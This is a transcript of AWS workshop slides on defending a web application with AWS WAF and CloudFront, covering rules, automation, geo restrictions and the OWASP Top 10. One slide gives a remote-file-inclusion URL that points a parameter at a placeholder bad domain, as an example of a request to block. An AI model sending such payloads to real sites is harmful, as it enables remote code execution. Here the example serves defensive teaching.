SlideShare a Scribd company logo
1 of 69
Download to read offline
© 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved.
Vlad Vlasceanu, Heitor Vital, Chris Colthurst
November 29, 2016
Secure Your Web Application with
AWS WAF and Amazon CloudFront
SAC202 - Workshop
The workshop team is here to help!
Chris Colthurst Sean Greathouse Assaf Namer
Heitor Vital Vlad Vlasceanu Christian Williams
What to expect from the workshop
• Each table expected to work as a team – find your number table
• Content is broken up into 3 chapters:
• Introduction and baseline protection
• Security automation
• Advanced rules and additional security controls
• Team tasks:
• Start with a baseline sample website (provided)
• 3 tasks: implement the controls discussed in each chapter
• Handout:
• Contains additional guidance for each task
• Find and implement the optimal solution!
A story of courage, friendship
… and WAF
Prelude
Your friend Bob knows that you’re great with computers
and asks you to set up a website for him…
Setup workshop environment
Follow the steps in the Prelude section of your handout to launch the AWS
CloudFormation template:
Checkpoint: What is AWS CloudFormation?
Download the CloudFormation template from:
https://s3-us-west-2.amazonaws.com/sac202-waf/sac202-cloudformation.json
Launch a CloudFormation stack using the downloaded template
Detailed steps are available in your handout document
1
3
Open the AWS Management Console for your account and go to
CloudFormation
Select the Oregon, N. Virginia or Ireland AWS regions in the top right corner
2
Chapter 1: Baseline website
and web application protection
What is a web application firewall?
• Web application firewall (WAF) is an appliance,
server plugin, or filter that applies a set of rules
to HTTP traffic
• WAFs come in four flavors
• Pure play: Standalone appliance or software
• CDN: bundled with content delivery network
• Load balancer: bundled with a load balancer
• Universal threat manager (UTM): catch-all
for misc. security
Why use a WAF?
Application vulnerabilities:
Good users
Bad folks
Web server Database
Exploit
code
Your application
Why use a WAF?
Abuse detection and prevention:
Good users
Bad folks
Web server Database
Your applicationData
leaks
Why use a WAF?
Distributed denial of service (DDOS) attacks:
Good users
Bad folks
Web server Database
Your application
AWS
WAF
Why use a WAF?
AWS WAF  block the bad folks and allow the good users:
Good users
Bad folks
Web server Database
Your application
Why use a WAF?
• WAFs help protect websites and applications against
attacks that cause data breaches and downtime
• General WAF use cases
• Protect from SQL injection (SQLi) and cross-site scripting (XSS)
• Prevent website scraping, crawlers, and BOTs
• Mitigate DDOS (HTTP/HTTPS floods)
• Gartner reports that main driver of WAF purchases (25-
30%) is PCI compliance
What about DDOS?
DDOS
Targeted
attacks
WAF
Reflection and
amplification
Layer 4 and 7
floods
Slowloris
SSL abuse
HTTP floods
SQL injection
Bots and probes
Application
exploits
Social
engineering
Reverse
engineering
Attack vectors addressed by AWS WAF
• SQL injection: Attackers insert malicious SQL code into web requests in
an effort to extract data from your database
• Cross-site scripting (XSS): Malicious scripts are injected into otherwise
benign and trusted websites
• Scanners and probes: Malicious sources scan and probe Internet-facing
web applications for vulnerabilities
• Known attacker origins (IP reputation lists): A number of organizations
maintain reputation lists of IP addresses of known attackers
• Bots and scrapers: Some automated clients misrepresent themselves to
bypass restrictions
• Application-level exploits
Amazon CloudFront + AWS WAF
Amazon CloudFront
• 68 points of presence around the world
• Improves performance by caching static
content and optimizing connections for
dynamic content
• Disperses traffic across global edge locations
• DDOS attacks (such as HTTP floods) are
absorbed close to the source
Introducing the AWS WAF
Unique aspects of AWS WAF
• Customizable rules created by customers to
avoid false positives
• Full-feature API: This is a DevOps WAF that can
be deployed inline with new websites and
applications
• Integrated with AWS: CloudFront, CloudWatch
• Integrated with partners: Alert Logic, TrendMicro,
Imperva
• Pay as you go pricing
AWS WAF components
1. Conditions:
• IP match
• String match
• SQL injection match
• Cross-site scripting match
• Size constraints
2. Rules: Precedence / rule / action
3. Web access control lists (web ACL)
4. AWS resource: CloudFront distribution
5. Reporting: Real-time metrics, sampled web requests
• Conditions are lists of criteria that
identify components of web requests
• Conditions include matching on the following:
• IP address i.e., /8, /16, /24, /32
• Strings, i.e., URI, query string, header, etc.
• SQL injection, i.e., looks for valid SQL statements
• Conditions are logically disjoined
• Conditions are reusable elements
• Filter targets and transformations
• Positional constraints (contains, exact,…)
AWS WAF: Conditions
AWS WAF: Rules
• Rules are sets of conditions with a
predetermined action
• Available actions are:
• Block
• Allow
• Count
• Rules can logically join conditions
• Rules are reusable elements
AWS WAF: Web ACL
• Web ACLs contain a set of conditions, rules, and
actions
• Web ACLs are applied to one or many CloudFront
distributions
• Web ACLs show you real-time metrics and sampled
web requests for each rule
• Web ACLs evaluate rules in order
• Whitelisting or blacklisting behavior
AWS WAF: Resource
Web ACLs are applied to CloudFront distributions
• Rule reusability: use one web ACL for all
distributions
• Flexibility: use individual web ACL for each
distribution
AWS WAF: Reporting and logs
• Real-time metrics (CloudWatch):
• Blocked web requests
• Allowed web requests
• Counted web requests
• Adjustments to rules in response to
real-time metrics and sampled
requests
• Time period can be adjusted by
sliding graph endpoints or via filters.
AWS WAF request process
Example: Whitelisting good users
Verify that a valid referrer is present
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; …
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referrer: http://www.example.com/
Connection: keep-alive
AWS
WAF
RAW request headers
CloudFront
Check: Header “Referrer”
Match Type: Contains
Match: “example.com”
Action: ALLOW
Rule
String match condition
Good users
Example: Blacklisting bad bots
Block unwanted user agent headers and use transforms to stop evasion:
Host: www.example.com
User-Agent: bAdBoT
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referrer: http://www.InTeRnEtkItTiEs.com/
Connection: keep-alive
AWS
WAF
RAW request headers
CloudFront
Check: Header “User-Agent”
Transform: To lower
Match Type: Contains
Match: “badbot”
Action: BLOCK
Rule
String match condition
Scraper bot
Bob runs for city council
and is worried
Task 1: Protect Bob’s
campaign website from threats
Chapter 2: AWS WAF security
automation
The story so far
We have a website (or web application) operational✓
Able to monitor it and analyze logs✓
Able to filter basic common attack vectors✓
Bob won the election and is
busy improving the lives of his
constituency
The threat landscape is evolving
Dynamically reconfigure the WAF rules and conditions to
better adapt to changing threats
• React to changing sources of malicious traffic
• React to changing signatures of malicious requests
• Leverage reputation lists and keep them updated
• Predictive analysis
Integration with DevOps  Analyzer
AWS
WAF
Logs
Threat
analysis
Rule updater
Notification
Security
engineer
Web serverGood users
Bad folks
Integration with DevOps  Scheduled
Threat
database
Scheduler
AWS
WAF
Web serverGood users
Bad folks
Rule updater
Building blocks
Amazon
S3
AWS
Lambda
Amazon
CloudWatch
AWS
CloudFormation
Amazon
API Gateway
AWS WAF
Amazon
CloudFront
Amazon
Machine
Learning
Amazon
Kinesis
Amazon
SNS
Logs
1. Analyzer
2. Rule updater
Metrics
& Alarms Pack solution
HTTP/S
endpointRule engine
Entry point
Advanced
analysis
Log
streamingAlerts
Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers
Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers
Log parser
HTTP flood
Scanner & probe protection
new access log files
a
Amazon
CloudFront
Amazon S3
Bucket
AWS Lambda
Log Parser
AWS WAF
b
c
Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers
IP reputation lists
known-attacker
protection
hourly
a
Amazon
CloudFront
AWS Lambda
IP Lists Parser
AWS WAF
b
c
Amazon
CloudWatch
event
Third-party IP
reputation lists
Security automation examples
HTTP floods Scanners and
probes
IP reputation lists Bots and scrapers
Bots and scrapers
bad bot
scraper protection
Amazon
CloudFront
AWS Lambda
Access Handler
AWS WAF
b
c
d
web application
resources
<a href="/v1/name/" style="display: none"
aria-hidden="true">honeypot link</a>
a
Bob runs for state senate
and is very worried
Task 2: Protect Bob’s
campaign website from
changing threats
AWS
WAF
Good users
Hands-On: HTTP/S protection
Bad folks
Runs for state senate
Chapter 3: Additional security
controls
The story so far
We have a website (or web application) operational✓
Able to monitor it and analyze logs✓
Able to filter basic common attack vectors✓
Able to automate and react to dynamic security
conditions
✓
Bob won the election and is
busy improving the lives of his
constituency
Where do we go from here?
What can we do to further improve security?
Restrict content to the geography of our audience✓
Securing our specific application profile✓
Prevent CDN bypass✓
Comprehensive look at web app security – OWASP Top 10✓
OWASP top 10 (2013)
Represents a broad consensus about what the most critical web application
security flaws are
A1
Injection
A2
Broken auth. And
session mgmt.
A3
Cross-site scripting
(xss)
A4
Insecure direct
object references
A5
Security
misconfiguration
A6
Sensitive data
exposure
A7
Missing function
level access ctrl.
A8
Cross-site request
forgery (csrf)
A9
Using components
with known
vulnerabilities
A10
Unvalidated
redirects and
forwards
OWASP top 10 (2013)
Not all OWASP top 10 flaws can be addressed with a WAF
Security flaws that AWS WAF can help mitigate to varying degrees:
A1
Injection
(E.G. Sql injection)
A2
Broken auth. And
session mgmt.
A3
Cross-site scripting
(xss)
A4
Insecure direct
object references
A5
Security
misconfiguration
A6
Sensitive data
exposure
A7
Missing function
level access ctrl.
A8
Cross-site request
forgery (csrf)
A9
Using components
with known
vulnerabilities
A10
Unvalidated
redirects and
forwards
✓ ✓
✓
✓
✓
Securing our specific application profile
Know your application in-depth, even is it’s a open
source/commercial off-the-shelf product
What services/URL paths does it expose to the web?
Keep them all up-to-date, and install security patches
timely
Keep exposure footprint low
1
3
Know the packages, libraries, components your
application is leveraging
Additional features and services they exposed
2
Limit access to nonpublic features
Does your website/application have a control/admin interface?
• Whitelist access to only known IP sources
At risk for vulnerable platform runtime/middleware?
• Block suspect requests by string matching
Does your app or runtime server-side include web accessible
components?
• Block access to such component URLs via string matching
Wordpress Admin: http://<my_domain>/wp-admin/
http://<my_domain>/?_SERVER[DOCUMENT_ROOT]=http://<bad_domain>/bad.txt?
http://<your_joomla_cms>/components/com_mojo/wp-comments-post.php
Example: Using string match sets
{
"ByteMatchSet": {
"ByteMatchSetId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"Name": "my-string-filters",
"ByteMatchTuples": [
{
"TargetString": "/wp-admin",
"PositionalConstraint": "STARTS_WITH",
"TextTransformation": ”URL_DECODE",
"FieldToMatch": { "Type": "URI" }
}
]
}
}
CloudFront geo restrictions
Geo restrictions or geoblocking: prevent users in specific
geographic locations from accessing content
• Amazon CloudFront supports geo restrictions at the country level
• Whitelisting or blacklisting approach
• Most commonly used to limit access to content to locations where a
distribution right exists
• Security perspective: limit exposure footprint and potentially
increase cost of launching attacks against your website
CloudFront geo restrictions in depth
• CloudFront distribution level restrictions
• CloudFront uses a third-party GeoIP database
• 99.8% accurate source IP geolocation
• Based on distribution restrictions, edge
location decides to allow or block
• Blocked requests return a 403 (Forbidden)
status code
Prevent CDN bypassing
Deploying a WAF filtering at the edge is effective
... as long as bad folks can’t bypass your CloudFront distribution
• Configure origins to only accept traffic from the CloudFront edge
locations
• Set up S3 origins to use an origin access identity (OAI) and
configure S3 bucket policies to accept GetObject API calls from the
OAI principal
• Configure firewall rules on custom origins to accept traffic only from
CloudFront IP ranges
Getting the AWS IP ranges
AWS publishes its current IP address ranges in JSON format:
• Both IPV4 and IPV6 ranges are published
• Filter the service attribute by the CLOUDFRONT value
• Track changes in list via the createDate attribute
• Subscribe to the following Amazon SNS topic to receive notifications
when AWS IP address ranges change:
https://ip-ranges.amazonaws.com/ip-ranges.json
Topic ARN: arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged
Automatic VPC security group updates
Blog post: How to Automatically Update Your Security Groups for
Amazon CloudFront and AWS WAF by Using AWS Lambda
http://amzn.to/2fj4Q8e
Create a VPC security group
Use tagging to designate they can be autoupdated
Create the AWS Lambda function
Using the provided code and execution role
1
3
Create an IAM policy and AWS Lambda execution role
Grant the function permission to change the security group
2
Create the function trigger
Using the Amazon SNS AmazonIpSpaceChanges topic
4
Bob runs for congress
and is extremely worried
Task 3: Add additional security
controls to bob’s campaign
website
Thank you!
Useful resources
AWS WAF Security Automations
https://aws.amazon.com/answers/security/aws-waf-security-automations/
AWS Best Practices for DDOS Resiliency
https://d0.awsstatic.com/whitepapers/Security/DDoS_White_Paper.pdf
Remember to complete
your evaluations!
Related sessions
CTD204 – Offload Security Heavy-lifting to the AWS Edge
- Nihar Bihani, Sr. Manager, AWS Product Management
SAC304 - Predictive Security: Using Big Data to Fortify Your Defenses
- Michael Capicotto and Matt Nowina, AWS Solutions Architects
SAC316 - Security Automation: Spend Less Time Securing Your
Applications
- Venkat Vijayaraghavan, AWS Sr. Product Manager; Nathan Dye, AWS Software
Development Manager

More Related Content

What's hot

AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...
AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...
AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...Amazon Web Services
 
Cloud Migration, Application Modernization, and Security
Cloud Migration, Application Modernization, and Security Cloud Migration, Application Modernization, and Security
Cloud Migration, Application Modernization, and Security Tom Laszewski
 
KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019
KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019
KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019Amazon Web Services Korea
 
Amazon API Gateway
Amazon API GatewayAmazon API Gateway
Amazon API GatewayMark Bate
 
AWS Certified Cloud Practitioner Course S1-S6
AWS Certified Cloud Practitioner Course S1-S6AWS Certified Cloud Practitioner Course S1-S6
AWS Certified Cloud Practitioner Course S1-S6Neal Davis
 
Using AWS Control Tower to govern multi-account AWS environments at scale - G...
Using AWS Control Tower to govern multi-account AWS environments at scale - G...Using AWS Control Tower to govern multi-account AWS environments at scale - G...
Using AWS Control Tower to govern multi-account AWS environments at scale - G...Amazon Web Services
 
금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...
금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...
금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...Amazon Web Services Korea
 
AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)
AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)
AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)Amazon Web Services Korea
 
Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019
Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019 Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019
Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019 Amazon Web Services
 
Implementing your landing zone - FND210 - AWS re:Inforce 2019
Implementing your landing zone - FND210 - AWS re:Inforce 2019 Implementing your landing zone - FND210 - AWS re:Inforce 2019
Implementing your landing zone - FND210 - AWS re:Inforce 2019 Amazon Web Services
 
Deep Dive on Amazon GuardDuty - AWS Online Tech Talks
Deep Dive on Amazon GuardDuty - AWS Online Tech TalksDeep Dive on Amazon GuardDuty - AWS Online Tech Talks
Deep Dive on Amazon GuardDuty - AWS Online Tech TalksAmazon Web Services
 
Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017
Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017
Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017Amazon Web Services Korea
 
AWS Multi-Account Architecture and Best Practices
AWS Multi-Account Architecture and Best PracticesAWS Multi-Account Architecture and Best Practices
AWS Multi-Account Architecture and Best PracticesAmazon Web Services
 
Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...
Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...
Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...Amazon Web Services
 
Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...
Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...
Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...Amazon Web Services
 
Managing and governing multi-account AWS environments using AWS Organizations...
Managing and governing multi-account AWS environments using AWS Organizations...Managing and governing multi-account AWS environments using AWS Organizations...
Managing and governing multi-account AWS environments using AWS Organizations...Amazon Web Services
 
Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018
Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018
Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018Amazon Web Services
 

What's hot (20)

AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...
AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...
AWS Networking – Advanced Concepts and new capabilities | AWS Summit Tel Aviv...
 
Cloud Migration Workshop
Cloud Migration WorkshopCloud Migration Workshop
Cloud Migration Workshop
 
Cloud Migration, Application Modernization, and Security
Cloud Migration, Application Modernization, and Security Cloud Migration, Application Modernization, and Security
Cloud Migration, Application Modernization, and Security
 
AWS Cloud Adoption Framework
AWS Cloud Adoption Framework AWS Cloud Adoption Framework
AWS Cloud Adoption Framework
 
KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019
KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019
KINX와 함께 하는 AWS Direct Connect 도입 - 남시우 매니저, KINX :: AWS Summit Seoul 2019
 
Amazon API Gateway
Amazon API GatewayAmazon API Gateway
Amazon API Gateway
 
ElastiCache & Redis
ElastiCache & RedisElastiCache & Redis
ElastiCache & Redis
 
AWS Certified Cloud Practitioner Course S1-S6
AWS Certified Cloud Practitioner Course S1-S6AWS Certified Cloud Practitioner Course S1-S6
AWS Certified Cloud Practitioner Course S1-S6
 
Using AWS Control Tower to govern multi-account AWS environments at scale - G...
Using AWS Control Tower to govern multi-account AWS environments at scale - G...Using AWS Control Tower to govern multi-account AWS environments at scale - G...
Using AWS Control Tower to govern multi-account AWS environments at scale - G...
 
금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...
금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...
금융권 고객을 위한 클라우드 보안 및 규정 준수 가이드 - 이대근 시큐리티 어슈어런스 매니저, AWS :: AWS Summit Seoul ...
 
AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)
AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)
AWS 6월 웨비나 | Amazon VPC Deep Dive (김상필 솔루션즈아키텍트)
 
Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019
Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019 Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019
Security best practices the well-architected way - SDD318 - AWS re:Inforce 2019
 
Implementing your landing zone - FND210 - AWS re:Inforce 2019
Implementing your landing zone - FND210 - AWS re:Inforce 2019 Implementing your landing zone - FND210 - AWS re:Inforce 2019
Implementing your landing zone - FND210 - AWS re:Inforce 2019
 
Deep Dive on Amazon GuardDuty - AWS Online Tech Talks
Deep Dive on Amazon GuardDuty - AWS Online Tech TalksDeep Dive on Amazon GuardDuty - AWS Online Tech Talks
Deep Dive on Amazon GuardDuty - AWS Online Tech Talks
 
Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017
Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017
Route53 및 CloudFront를 이용한 CDN 활용기 - AWS Summit Seoul 2017
 
AWS Multi-Account Architecture and Best Practices
AWS Multi-Account Architecture and Best PracticesAWS Multi-Account Architecture and Best Practices
AWS Multi-Account Architecture and Best Practices
 
Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...
Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...
Introduction to the Well-Architected Framework and Tool - SVC208 - Anaheim AW...
 
Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...
Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...
Architecture Patterns for Multi-Region Active-Active Applications (ARC209-R2)...
 
Managing and governing multi-account AWS environments using AWS Organizations...
Managing and governing multi-account AWS environments using AWS Organizations...Managing and governing multi-account AWS environments using AWS Organizations...
Managing and governing multi-account AWS environments using AWS Organizations...
 
Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018
Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018
Best Practices for AWS PrivateLink (NET301) - AWS re:Invent 2018
 

Viewers also liked

(SEC323) New: Securing Web Applications with AWS WAF
(SEC323) New: Securing Web Applications with AWS WAF(SEC323) New: Securing Web Applications with AWS WAF
(SEC323) New: Securing Web Applications with AWS WAFAmazon Web Services
 
Using AWS WAF and Lambda for Automatic Protection
Using AWS WAF and Lambda for Automatic ProtectionUsing AWS WAF and Lambda for Automatic Protection
Using AWS WAF and Lambda for Automatic ProtectionAmazon Web Services
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFAmazon Web Services
 
AWS Black Belt Tech シリーズ 2015 - AWS WAF
AWS Black Belt Tech シリーズ 2015 - AWS WAFAWS Black Belt Tech シリーズ 2015 - AWS WAF
AWS Black Belt Tech シリーズ 2015 - AWS WAFAmazon Web Services Japan
 
AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)
AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)
AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)Amazon Web Services
 
AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...
AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...
AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...Amazon Web Services
 
Setup Preconfigured Protections on AWS WAF - November 2016 Webinar Series
Setup Preconfigured Protections on AWS WAF - November 2016 Webinar SeriesSetup Preconfigured Protections on AWS WAF - November 2016 Webinar Series
Setup Preconfigured Protections on AWS WAF - November 2016 Webinar SeriesAmazon Web Services
 
Announcing Lambda @ the Edge - December 2016 Monthly Webinar Series
Announcing Lambda @ the Edge - December 2016 Monthly Webinar SeriesAnnouncing Lambda @ the Edge - December 2016 Monthly Webinar Series
Announcing Lambda @ the Edge - December 2016 Monthly Webinar SeriesAmazon Web Services
 
AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)
AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)
AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)Amazon Web Services
 
NEW LAUNCH! AWS Shield—A Managed DDoS Protection Service
NEW LAUNCH! AWS Shield—A Managed DDoS Protection ServiceNEW LAUNCH! AWS Shield—A Managed DDoS Protection Service
NEW LAUNCH! AWS Shield—A Managed DDoS Protection ServiceAmazon Web Services
 
AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...
AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...
AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...Amazon Web Services
 
AWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFront
AWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFrontAWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFront
AWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFrontAmazon Web Services
 
Analyzing data, Optimizing Service Experience for Retailers
Analyzing data, Optimizing Service Experience for Retailers Analyzing data, Optimizing Service Experience for Retailers
Analyzing data, Optimizing Service Experience for Retailers Amazon Web Services
 
How Mature is Your Infrastructure?
How Mature is Your Infrastructure?How Mature is Your Infrastructure?
How Mature is Your Infrastructure?Gary Stafford
 
Getting the Most Out of Your NoSQL DB
Getting the Most Out of Your NoSQL DBGetting the Most Out of Your NoSQL DB
Getting the Most Out of Your NoSQL DBBigstep
 
AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...
AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...
AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...Amazon Web Services
 
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Amazon Web Services
 
Deep Dive: Infrastructure as Code
Deep Dive: Infrastructure as CodeDeep Dive: Infrastructure as Code
Deep Dive: Infrastructure as CodeAmazon Web Services
 
Introduction to Amazon CloudFront - Pop-up Loft Tel Aviv
Introduction to Amazon CloudFront - Pop-up Loft Tel AvivIntroduction to Amazon CloudFront - Pop-up Loft Tel Aviv
Introduction to Amazon CloudFront - Pop-up Loft Tel AvivAmazon Web Services
 

Viewers also liked (20)

(SEC323) New: Securing Web Applications with AWS WAF
(SEC323) New: Securing Web Applications with AWS WAF(SEC323) New: Securing Web Applications with AWS WAF
(SEC323) New: Securing Web Applications with AWS WAF
 
Using AWS WAF and Lambda for Automatic Protection
Using AWS WAF and Lambda for Automatic ProtectionUsing AWS WAF and Lambda for Automatic Protection
Using AWS WAF and Lambda for Automatic Protection
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
 
AWS Black Belt Tech シリーズ 2015 - AWS WAF
AWS Black Belt Tech シリーズ 2015 - AWS WAFAWS Black Belt Tech シリーズ 2015 - AWS WAF
AWS Black Belt Tech シリーズ 2015 - AWS WAF
 
AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)
AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)
AWS re:Invent 2016: Deep Dive on Amazon Elastic Block Store (STG301)
 
AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...
AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...
AWS re:Invent 2016: Design Patterns for High Availability: Lessons from Amazo...
 
Setup Preconfigured Protections on AWS WAF - November 2016 Webinar Series
Setup Preconfigured Protections on AWS WAF - November 2016 Webinar SeriesSetup Preconfigured Protections on AWS WAF - November 2016 Webinar Series
Setup Preconfigured Protections on AWS WAF - November 2016 Webinar Series
 
Announcing Lambda @ the Edge - December 2016 Monthly Webinar Series
Announcing Lambda @ the Edge - December 2016 Monthly Webinar SeriesAnnouncing Lambda @ the Edge - December 2016 Monthly Webinar Series
Announcing Lambda @ the Edge - December 2016 Monthly Webinar Series
 
AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)
AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)
AWS re:Invent 2016: From One to Many: Evolving VPC Design (ARC302)
 
NEW LAUNCH! AWS Shield—A Managed DDoS Protection Service
NEW LAUNCH! AWS Shield—A Managed DDoS Protection ServiceNEW LAUNCH! AWS Shield—A Managed DDoS Protection Service
NEW LAUNCH! AWS Shield—A Managed DDoS Protection Service
 
AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...
AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...
AWS re:Invent 2016: Common Considerations for Data Integrity Controls in Heal...
 
Defense against botnets
Defense against botnetsDefense against botnets
Defense against botnets
 
AWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFront
